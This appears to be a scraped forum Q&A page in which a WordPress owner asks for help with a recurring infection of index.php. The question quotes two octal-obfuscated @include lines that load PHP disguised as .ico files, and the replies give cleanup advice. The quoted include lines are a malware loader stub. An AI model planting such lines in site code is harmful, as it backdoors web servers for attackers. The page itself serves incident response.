Home > Back-end >  Index.php Again a line of code appears @include in mi index.php wordpress
Index.php Again a line of code appears @include in mi index.php wordpress

Time:01-18

i have a problem with mi WordPress, a line of code appears @include in mi index.php first this line:



/*7ec80*/

@include ("\057h\157m\145/\0622\141d\155i\156l\141c\157l\165m\156a\162i\141b\154o\147/\167e\142/\154a\143o\154u\155n\141r\151a\142l\157g\056c\157m\057p\165b\154i\143_\150t\155l\057b\157r\162a\162/\167p\055i\156c\154u\144e\163/\123i\155p\154e\120i\145/\056c\061e\063d\144a\146.\151c\157");

/*7ec80*/

i see than is a line related with


/home/22adminlacolumnariablog/web/lacolumnariablog.com/public_html/borrar/wp-includes/SimplePie/.c1e3ddaf.ico

procceded to migrate of serve proceeded to delete everything but the wp-content. to filter all php disguised as .ico and remove them. 10 days passed and the problem appeared again but with this line:


/*7ec80*/

@include ("\057hom\145/22\141dmi\156lac\157lum\156ari\141blo\147/we\142/la\143olu\155nar\151abl\157g.c\157m/p\165bli\143_ht\155l/w\160-co\156ten\164/up\154oad\163/20\0620/.\0627ab\066a70\056ico");

/*7ec80*/

this time I don't know which file it is related to. I need help because i need lock mi index.php with WordPress index.php standar lines. Have any of you encountered this virus, it is already 3 months old, we have deleted everything except the WP-CONTENT (Several times) (No matter how much I erase the line, it reappears). The solution for 2 weeks is to delete everything except the wp-content but it is not the final solution because after 2 weeks it reappears, I am the one who is solving the problem, Here in Venezuela i dont have access to a expert security server, I only wanna block edit my edit.php because this index.php is the only file that can be modified, the others belong to root as owner. I need a something to block the edition of index.php or disable it, the @include and since the wordpress standard does not use this in the index.php –

CodePudding user response:

Yes, I have deleted everything except the wp-content, I have vps, so I am my own provider, can you specify more details on how to block that index.php, since I use cpanel installed from a standar (default) ubuntu 20.04

CodePudding user response:

First remove the line of code from index.php in public_html then ask your hosting provider to lock the index.php file immediately . In this case the file neither could be modified nor deleted or replaced. But keep in mined that this is just like Erasing the problem statement on the blackboard not solving it! It may be a vulnerability in WordPress itself or a theme or some plugins. Replace wp-admin and wp-includes from an fresh WordPress file, disable all WordPress plugin and themes. Look for any suspicious file inside wp-content. Download any plugin and theme from original source and install then active them one by one. Maybe one of those plugins is source of this problem.

Page link:https//www.codepudding.com/Backend/675963.html

Prev:Does disabling the "Allow from Unknown Sources" Option in the Android settings prevent aut
Next:Flask uploaded file encoding decoding for pypdf2
  • Related

About Us:  Contact Us      Terms of Service       Privacy Policy

Copyright © 2010-2023,Powered By CodePudding